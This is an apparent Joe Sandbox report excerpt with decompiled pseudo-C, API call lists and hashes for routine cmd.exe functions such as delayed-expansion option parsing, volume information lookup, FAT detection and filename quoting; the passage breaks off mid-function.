
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 011DC489
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC490
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 011DC4A6
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC4AD
                                    • _wcsicmp.MSVCRT ref: 011DC538
                                    • _wcsicmp.MSVCRT ref: 011DC54A
                                    • _wcsicmp.MSVCRT ref: 011DC577
                                    • _wcsicmp.MSVCRT ref: 011EA932
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap_wcsicmp$AllocProcess
                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                    • API String ID: 435930816-3086019870
                                    • Opcode ID: f97d90736b195a60c8569bb1f6290ba6137d50272b51b8141da158bcb1f471f0
                                    • Instruction ID: d6c9d0c1d99095b623c986b5dd1170a49416d7388a99cee5ea1ecac3c27d52b1
                                    • Opcode Fuzzy Hash: f97d90736b195a60c8569bb1f6290ba6137d50272b51b8141da158bcb1f471f0
                                    • Instruction Fuzzy Hash: 405138353046029FEB2DDF79B808A773BE5FF18624715486EE842C7286EF21D841CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E011FA834(intOrPtr __ecx, DWORD* __edx) {
                                    				signed int _v8;
                                    				char _v524;
                                    				int _v532;
                                    				char _v536;
                                    				int _v540;
                                    				void _v1060;
                                    				long _v1068;
                                    				char _v1072;
                                    				int _v1076;
                                    				void _v1596;
                                    				int _v1604;
                                    				char _v1608;
                                    				void* _v1612;
                                    				void _v2132;
                                    				intOrPtr _v2136;
                                    				intOrPtr _v2140;
                                    				signed short _v2142;
                                    				long _v2144;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t65;
                                    				intOrPtr _t98;
                                    				WCHAR* _t102;
                                    				short* _t104;
                                    				WCHAR* _t105;
                                    				DWORD* _t107;
                                    				signed short _t108;
                                    				DWORD* _t120;
                                    				void* _t131;
                                    				WCHAR* _t133;
                                    				short* _t134;
                                    				WCHAR* _t136;
                                    				short* _t138;
                                    				intOrPtr* _t142;
                                    				signed int _t144;
                                    				DWORD* _t146;
                                    				signed int _t148;
                                    
                                    				_t141 = __edx;
                                    				_t65 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t65 ^ _t148;
                                    				_v2136 = __ecx;
                                    				_t146 = 0;
                                    				_v1604 = 0x104;
                                    				_v1612 = 0;
                                    				_t120 = 1;
                                    				_t145 = __edx;
                                    				_v1608 = 1;
                                    				memset( &_v2132, 0, 0x104);
                                    				_v1076 = 0;
                                    				_v1072 = 1;
                                    				_v1068 = 0x104;
                                    				memset( &_v1596, 0, 0x104);
                                    				_v540 = 0;
                                    				_v536 = 1;
                                    				_v532 = 0x104;
                                    				memset( &_v1060, 0, 0x104);
                                    				_t122 =  &_v2132;
                                    				if(E011E0C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L46:
                                    					_push(_t146);
                                    					_push(8);
                                    					E011DC5A2(_t122);
                                    					_t146 = _t120;
                                    					L47:
                                    					_t120 = _t146;
                                    					L48:
                                    					_t147 = _t120;
                                    					L49:
                                    					__imp__??_V@YAXPAX@Z(_v540);
                                    					__imp__??_V@YAXPAX@Z(_v1076);
                                    					__imp__??_V@YAXPAX@Z();
                                    					return E011E6FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
                                    				}
                                    				_t122 =  &_v1596;
                                    				if(E011E0C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					goto L46;
                                    				}
                                    				_t122 =  &_v1060;
                                    				if(E011E0C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					goto L46;
                                    				}
                                    				E011E0D89(_t141, _t145);
                                    				_t131 = _v1612;
                                    				_t142 = _t131;
                                    				if(_t131 == 0) {
                                    					_t142 =  &_v2132;
                                    				}
                                    				_t145 = _t142 + 2;
                                    				do {
                                    					_t98 =  *_t142;
                                    					_t142 = _t142 + 2;
                                    				} while (_t98 != _t146);
                                    				_t99 = _v540;
                                    				_t144 = _t142 - _t145 >> 1;
                                    				if(_v540 == 0) {
                                    					_t99 =  &_v1060;
                                    				}
                                    				if(_t131 == 0) {
                                    					_t131 =  &_v2132;
                                    				}
                                    				_t141 = _t144 + 1;
                                    				if(E011E4C89(_t131, _t144 + 1, _t99, _v532) == 0) {
                                    					goto L47;
                                    				} else {
                                    					E011E0CF2(_t141, "\\");
                                    					_t133 = _v1076;
                                    					if(_t133 == 0) {
                                    						_t133 =  &_v1596;
                                    					}
                                    					_t102 = _v540;
                                    					if(_t102 == 0) {
                                    						_t102 =  &_v1060;
                                    					}
                                    					_t141 =  &_v2144;
                                    					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
                                    						_t104 = _v540;
                                    						_t134 = _t104;
                                    						if(_t104 == 0) {
                                    							_t134 =  &_v1060;
                                    						}
                                    						if( *_t134 != 0x5c) {
                                    							if(_t104 == 0) {
                                    								_t104 =  &_v1060;
                                    							}
                                    							 *((short*)(_t104 + 2)) = 0;
                                    							goto L31;
                                    						} else {
                                    							if(_t104 == 0) {
                                    								_t104 =  &_v1060;
                                    							}
                                    							_t138 = _t104;
                                    							while( *_t104 != _t146) {
                                    								_t138 = _t104;
                                    								_t104 = _t104 + 2;
                                    							}
                                    							 *_t138 = 0;
                                    							L31:
                                    							_t105 = _v1076;
                                    							_t136 = _t105;
                                    							if(_t105 == 0) {
                                    								_t136 =  &_v1596;
                                    							}
                                    							if( *_t136 == _t146) {
                                    								_t106 = _v540;
                                    								if(_v540 == 0) {
                                    									_t106 =  &_v1060;
                                    								}
                                    								_t145 = _v2136;
                                    								_t107 = E011F7C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
                                    							} else {
                                    								if(_t105 == 0) {
                                    									_t105 =  &_v1596;
                                    								}
                                    								_t137 = _v540;
                                    								if(_v540 == 0) {
                                    									_t137 =  &_v1060;
                                    								}
                                    								_t145 = _v2136;
                                    								_push(_t105);
                                    								_t107 = E011F7C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
                                    							}
                                    							_t147 = _t107;
                                    							if(_t107 == 0) {
                                    								_t108 = _v2144;
                                    								if(_t108 != 0 || _v2140 != _t108) {
                                    									_push(_t108 & 0x0000ffff);
                                    									E011E274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
                                    									_t147 = E011F7C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
                                    								}
                                    							}
                                    							goto L49;
                                    						}
                                    					} else {
                                    						if(GetLastError() == 0x90) {
                                    							goto L47;
                                    						}
                                    						_push(_t146);
                                    						_push(GetLastError());
                                    						E011DC5A2(_t133);
                                    						goto L48;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011FA879
                                    • memset.MSVCRT ref: 011FA8A1
                                    • memset.MSVCRT ref: 011FA8C9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011FA9F1
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 011FA9FB
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 011FAA0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB45
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB52
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$ErrorLast$InformationVolume
                                    • String ID: %04X-%04X
                                    • API String ID: 2748242238-1126166780
                                    • Opcode ID: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                    • Instruction ID: 94e9f4bf92a855db9f811c40c5fd1942edafa6ba79c4867ada87fcda2a5e8930
                                    • Opcode Fuzzy Hash: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                    • Instruction Fuzzy Hash: 6291C4B1A012295BDF29DA64DC44AEA77B9EF54258F4404EDE60DE3141EB349F88CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 66%
                                    			E011E3121(void* __ecx, void* __edx) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				long _v556;
                                    				char _v560;
                                    				int _v564;
                                    				void _v1084;
                                    				int _v1092;
                                    				char _v1096;
                                    				void* _v1100;
                                    				void _v1620;
                                    				long _v1624;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t47;
                                    				WCHAR* _t64;
                                    				WCHAR* _t84;
                                    				signed int _t86;
                                    				void* _t87;
                                    				WCHAR* _t89;
                                    				WCHAR* _t102;
                                    				void* _t110;
                                    				void* _t111;
                                    				signed int _t112;
                                    
                                    				_t109 = __edx;
                                    				_t47 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t47 ^ _t112;
                                    				_v560 = 1;
                                    				_t89 = 0;
                                    				_v556 = 0x104;
                                    				_v564 = 0;
                                    				_t111 = __edx;
                                    				_t110 = __ecx;
                                    				memset( &_v1084, 0, 0x104);
                                    				_v28 = 0;
                                    				_v24 = 1;
                                    				_v20 = 0x104;
                                    				memset( &_v548, 0, 0x104);
                                    				_v1100 = 0;
                                    				_v1096 = 1;
                                    				_v1092 = 0x104;
                                    				memset( &_v1620, 0, 0x104);
                                    				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					 *0x1213cf0 = 8;
                                    					_t64 = _t89;
                                    					goto L21;
                                    				} else {
                                    					_t79 = _v1100;
                                    					 *0x1213cf0 = 0;
                                    					if(_v1100 == 0) {
                                    						_t79 =  &_v1620;
                                    					}
                                    					_t109 = _t111;
                                    					if(E011E4C89(_t110, _t111, _t79, _v1092) != 0) {
                                    						_t81 = _v1100;
                                    						if(_v1100 == 0) {
                                    							_t81 =  &_v1620;
                                    						}
                                    						E011E0D89(_t109, _t81);
                                    						E011E0CF2(_t109, "\\");
                                    						_t102 = _v564;
                                    						if(_t102 == 0) {
                                    							_t102 =  &_v1084;
                                    						}
                                    						_t84 = _v28;
                                    						if(_t84 == 0) {
                                    							_t84 =  &_v548;
                                    						}
                                    						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
                                    							_t86 = GetLastError();
                                    							_t46 = _t86 - 0x90; // -144
                                    							asm("sbb ecx, ecx");
                                    							 *0x1213cf0 =  ~_t46 & _t86;
                                    						} else {
                                    							_t87 = _v564;
                                    							if(_t87 == 0) {
                                    								_t87 =  &_v1084;
                                    							}
                                    							__imp___wcsicmp(_t87, L"FAT");
                                    							if(_t87 == 0) {
                                    								if(_v1624 == 0xc) {
                                    									_t64 = 1;
                                    									L21:
                                    									_t89 = _t64;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				__imp__??_V@YAXPAX@Z(_v1100);
                                    				__imp__??_V@YAXPAX@Z(_v28);
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
                                    			}































                                    APIs
                                    • memset.MSVCRT ref: 011E3160
                                    • memset.MSVCRT ref: 011E3180
                                    • memset.MSVCRT ref: 011E31A9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011E32AB
                                    • _wcsicmp.MSVCRT ref: 011E32C9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32DF
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32E9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$InformationVolume_wcsicmp
                                    • String ID: FAT
                                    • API String ID: 4247940253-238207945
                                    • Opcode ID: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                    • Instruction ID: 2f8af6c6ac2adc470c54c2c8a728e0d2c05dde3b0e6128891aa713d2ca43ffdb
                                    • Opcode Fuzzy Hash: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                    • Instruction Fuzzy Hash: 365143B1A106199BDF28CAE4DC9DBEA77F8FB14348F0400E9E519E3141EB759E84CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E011DAD44(WCHAR* __ecx) {
                                    				signed int _v8;
                                    				void* _v608;
                                    				long _v612;
                                    				char _v616;
                                    				int _v620;
                                    				void* _v624;
                                    				void _v1140;
                                    				WCHAR* _v1144;
                                    				WCHAR* _v1148;
                                    				void* _v1152;
                                    				void* _v1164;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t32;
                                    				signed int _t34;
                                    				WCHAR* _t45;
                                    				int _t48;
                                    				wchar_t* _t49;
                                    				long _t50;
                                    				intOrPtr* _t51;
                                    				signed int _t57;
                                    				void* _t59;
                                    				void* _t60;
                                    				signed int _t61;
                                    				WCHAR* _t62;
                                    				void* _t78;
                                    				void* _t81;
                                    				signed int _t82;
                                    				WCHAR* _t84;
                                    				void* _t85;
                                    				WCHAR* _t86;
                                    				wchar_t* _t87;
                                    				signed int _t89;
                                    				signed int _t91;
                                    
                                    				_t91 = (_t89 & 0xfffffff8) - 0x47c;
                                    				_t32 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t32 ^ _t91;
                                    				_push(_t59);
                                    				_t84 = __ecx;
                                    				_v1144 = __ecx;
                                    				if(__ecx == 0) {
                                    					_t34 = 0;
                                    					L11:
                                    					_pop(_t81);
                                    					_pop(_t85);
                                    					_pop(_t60);
                                    					return E011E6FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
                                    				}
                                    				_v616 = 1;
                                    				_t82 = 0;
                                    				_v612 = 0x104;
                                    				_v620 = 0;
                                    				memset( &_v1140, 0, 0x104);
                                    				_t91 = _t91 + 0xc;
                                    				if(E011E0C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
                                    					L10:
                                    					__imp__??_V@YAXPAX@Z(_v620);
                                    					_t34 = _t82;
                                    					goto L11;
                                    				}
                                    				_t45 = _v620;
                                    				if(_t45 == 0) {
                                    					_t45 =  &_v1140;
                                    				}
                                    				_t61 = GetFullPathNameW(E011E22C0(_t59, _t84), _v612, _t45,  &_v1148);
                                    				if(_t61 == 0) {
                                    					L9:
                                    					_t82 = _t61;
                                    					goto L10;
                                    				} else {
                                    					_t86 = _v620;
                                    					if(_t86 == 0) {
                                    						_t86 =  &_v1140;
                                    					}
                                    					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
                                    					_t91 = _t91 + 0xc;
                                    					if(_t48 == 0) {
                                    						_t62 = _v1144;
                                    						_t87 =  &(_t86[4]);
                                    						_v1148 = _t87;
                                    						_t49 = wcsstr(_t62, _t87);
                                    						_v1148 = _t49;
                                    						if(_t49 == 0 || _t49 <= _t62) {
                                    							_t50 = GetFileAttributesW(_t62);
                                    						} else {
                                    							 *_t49 = 0;
                                    							_t50 = GetFileAttributesW(_t62);
                                    							 *_v1148 =  *_t49 & 0x0000ffff;
                                    						}
                                    						if(_t50 != 0xffffffff) {
                                    							_t82 = _t50;
                                    						}
                                    						goto L10;
                                    					} else {
                                    						_t51 = _v1148;
                                    						if(_t51 == 0 ||  *_t51 == _t82) {
                                    							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
                                    						} else {
                                    							_t79 = _t86;
                                    							_t61 = E011E68BA(E011E6A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
                                    							E011DCD27( *((intOrPtr*)(_t91 + 0x14)));
                                    							if(_t61 == 0) {
                                    								_t57 = _t86[1] & 0x0000ffff;
                                    								_t78 = 0x5c;
                                    								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
                                    									if(GetDriveTypeW(_t86) > 1) {
                                    										_t61 = 1;
                                    									}
                                    								}
                                    							}
                                    						}
                                    						goto L9;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011DAD95
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 011DADEA
                                    • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 011DAE0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DAE68
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 011F128D
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • wcsstr.MSVCRT ref: 011F1249
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F1266
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F12A5
                                      • Part of subcall function 011E68BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
                                    • String ID: \\.\
                                    • API String ID: 52035941-2900601889
                                    • Opcode ID: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                    • Instruction ID: b9982ff7bba0fc8d7c8cb2771a2f88bc23f943d8e867d9336029e6e3ccd5e984
                                    • Opcode Fuzzy Hash: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                    • Instruction Fuzzy Hash: DE411C75504351ABDB38DFA8A888A6FBBE8EF94714F14081DF955C3181EB30D944C7A3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E011FAEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
                                    				signed int _v8;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				char _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				void* _v66;
                                    				intOrPtr _v70;
                                    				intOrPtr _v74;
                                    				intOrPtr _v78;
                                    				intOrPtr _v82;
                                    				intOrPtr _v86;
                                    				intOrPtr _v90;
                                    				intOrPtr _v94;
                                    				intOrPtr _v98;
                                    				short _v100;
                                    				intOrPtr _v104;
                                    				signed int _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				char _v124;
                                    				signed char _v125;
                                    				signed int _v132;
                                    				int _v136;
                                    				signed int _v140;
                                    				signed short* _v144;
                                    				void* _v148;
                                    				signed int _v152;
                                    				int _v156;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t96;
                                    				signed int _t105;
                                    				void* _t111;
                                    				long _t113;
                                    				void* _t115;
                                    				signed int _t122;
                                    				signed int _t123;
                                    				signed int _t124;
                                    				signed int _t125;
                                    				void* _t126;
                                    				void* _t129;
                                    				signed int _t138;
                                    				void _t142;
                                    				long _t144;
                                    				long _t146;
                                    				signed short* _t154;
                                    				void* _t157;
                                    				signed short _t164;
                                    				signed int _t171;
                                    				signed int _t173;
                                    				signed char _t177;
                                    				signed char _t179;
                                    				long _t180;
                                    				int _t185;
                                    				void* _t188;
                                    				signed int _t191;
                                    				void* _t192;
                                    				void* _t193;
                                    				signed int* _t194;
                                    				int _t197;
                                    				signed short* _t198;
                                    				void* _t199;
                                    				int _t200;
                                    				signed short* _t203;
                                    				intOrPtr _t204;
                                    				signed int _t205;
                                    				void* _t206;
                                    
                                    				_t96 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t96 ^ _t205;
                                    				_t154 = __ecx;
                                    				_v148 = __ecx;
                                    				_v136 = _a8;
                                    				_v108 = 0;
                                    				_v100 = 0;
                                    				_v124 = 0;
                                    				_v120 = 0;
                                    				_v116 = 0;
                                    				_v112 = 0;
                                    				_v104 = 0;
                                    				_v98 = 0;
                                    				_v94 = 0;
                                    				_v90 = 0;
                                    				_v86 = 0;
                                    				_v82 = 0;
                                    				_v78 = 0;
                                    				_v74 = 0;
                                    				_v70 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosw");
                                    				_v52 = 0;
                                    				_v48 = 0;
                                    				_v44 = 0;
                                    				_v40 = 0;
                                    				_v36 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				E011FB4DD(0);
                                    				_t157 = 0x2c;
                                    				_t191 = E011E00B0(_t157);
                                    				if(_t191 == 0) {
                                    					E011F9287(_t157);
                                    					__imp__longjmp(0x120b8b8, 1);
                                    				}
                                    				_t187 =  &_v124;
                                    				 *((intOrPtr*)(_t191 + 8)) = 0x800;
                                    				asm("sbb esi, esi");
                                    				_t197 =  ~_a4 & 0x00000010;
                                    				E011DCB48( &_v124);
                                    				_t159 = _v48;
                                    				if(_v48 == 0 || E011E3B5D(_t159,  &_v124) == 1) {
                                    					L57:
                                    					E011E5D39();
                                    					_t105 = 0;
                                    				} else {
                                    					_t187 = 0;
                                    					if(E011E4800( &_v124, 0, 1,  &_v132) == 1) {
                                    						goto L57;
                                    					} else {
                                    						_t187 = _t191;
                                    						_t197 = _v132;
                                    						_t111 = E011E5590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
                                    						if(_t111 != 0) {
                                    							goto L57;
                                    						} else {
                                    							if( *(_t197 + 0x14) != _t111) {
                                    								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E011F9C40);
                                    								_t206 = _t206 + 0x10;
                                    							}
                                    							_t164 = 0x22;
                                    							_t198 = _t154;
                                    							_v125 = 0;
                                    							_t191 = 0;
                                    							_t187 = 2;
                                    							while(1) {
                                    								_t113 =  *_t198 & 0x0000ffff;
                                    								if(_t113 == 0) {
                                    									break;
                                    								}
                                    								if(_t113 != _t164) {
                                    									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
                                    										_v125 = 1;
                                    									}
                                    									_t187 = 2;
                                    									 *_t154 =  *_t198;
                                    									_t164 = 0x22;
                                    									goto L18;
                                    								} else {
                                    									_t185 = _v136;
                                    									_t191 = _t191 + _t187;
                                    									_v125 = 1;
                                    									_t198 = _t198 + _t187;
                                    									if(_t185 >= _t191 >> 1) {
                                    										_v136 = _t185 - 1;
                                    									}
                                    									_t164 = 0x22;
                                    									if( *_t198 == _t164) {
                                    										 *_t154 = _t164;
                                    										L18:
                                    										_t154 = _t154 + _t187;
                                    										_t198 = _t198 + _t187;
                                    										_t191 = _t191 + _t187;
                                    									}
                                    								}
                                    								if((_t191 & 0xfffffffe) < 0x4000) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							 *_t154 = 0;
                                    							_t154 = _v132;
                                    							_t197 = _t154[0xa];
                                    							_v156 = _t197;
                                    							_t115 = calloc(4, _t197);
                                    							 *0x121853c = _t115;
                                    							if(_t115 == 0) {
                                    								goto L57;
                                    							} else {
                                    								_v140 = 0;
                                    								_t191 = 0;
                                    								_v132 = 0;
                                    								if(_t197 > 0) {
                                    									do {
                                    										_t187 = ".";
                                    										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
                                    										_t122 = _t171;
                                    										while(1) {
                                    											_t197 =  *_t122;
                                    											if(_t197 !=  *_t187) {
                                    												break;
                                    											}
                                    											if(_t197 == 0) {
                                    												L27:
                                    												_t123 = 0;
                                    											} else {
                                    												_t197 =  *((intOrPtr*)(_t122 + 2));
                                    												_t53 = _t187 + 2; // 0x200000
                                    												if(_t197 !=  *_t53) {
                                    													break;
                                    												} else {
                                    													_t122 = _t122 + 4;
                                    													_t187 = _t187 + 4;
                                    													if(_t197 != 0) {
                                    														continue;
                                    													} else {
                                    														goto L27;
                                    													}
                                    												}
                                    											}
                                    											L29:
                                    											if(_t123 != 0) {
                                    												_t187 = L"..";
                                    												_t124 = _t171;
                                    												while(1) {
                                    													_t199 =  *_t124;
                                    													if(_t199 !=  *_t187) {
                                    														break;
                                    													}
                                    													if(_t199 == 0) {
                                    														L35:
                                    														_t197 = 0;
                                    														_t125 = 0;
                                    													} else {
                                    														_t204 =  *((intOrPtr*)(_t124 + 2));
                                    														_t55 = _t187 + 2; // 0x2e
                                    														if(_t204 !=  *_t55) {
                                    															break;
                                    														} else {
                                    															_t124 = _t124 + 4;
                                    															_t187 = _t187 + 4;
                                    															if(_t204 != 0) {
                                    																continue;
                                    															} else {
                                    																goto L35;
                                    															}
                                    														}
                                    													}
                                    													L37:
                                    													if(_t125 != 0) {
                                    														_t188 = _t171 + 2;
                                    														do {
                                    															_t126 =  *_t171;
                                    															_t171 = _t171 + 2;
                                    														} while (_t126 != _t197);
                                    														_t197 = _v136;
                                    														_t173 = _t171 - _t188 >> 1;
                                    														_v152 = _t173;
                                    														_t129 = calloc(_t197 + 4 + _t173, 2);
                                    														_t187 =  *0x121853c;
                                    														 *(_t187 + _v140 * 4) = _t129;
                                    														if(_t129 != 0) {
                                    															_t177 = _v125;
                                    															if(_t177 != 0) {
                                    																_v144 = 0;
                                    															} else {
                                    																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
                                    																_v144 = _t203;
                                    																_t144 =  *_t203 & 0x0000ffff;
                                    																if(_t144 != 0) {
                                    																	_t180 = _t144;
                                    																	do {
                                    																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
                                    																			_v125 = 1;
                                    																		}
                                    																		_t203 =  &(_t203[1]);
                                    																		_t146 =  *_t203 & 0x0000ffff;
                                    																		_t180 = _t146;
                                    																	} while (_t146 != 0);
                                    																	_t177 = _v125;
                                    																	_t187 =  *0x121853c;
                                    																	_v144 = _t203;
                                    																}
                                    																_t197 = _v136;
                                    															}
                                    															_t192 =  *(_t187 + _v140 * 4);
                                    															if(_t177 != 0) {
                                    																_t142 = 0x22;
                                    																 *_t192 = _t142;
                                    																_t192 = _t192 + 2;
                                    															}
                                    															_t200 = _t197 + _t197;
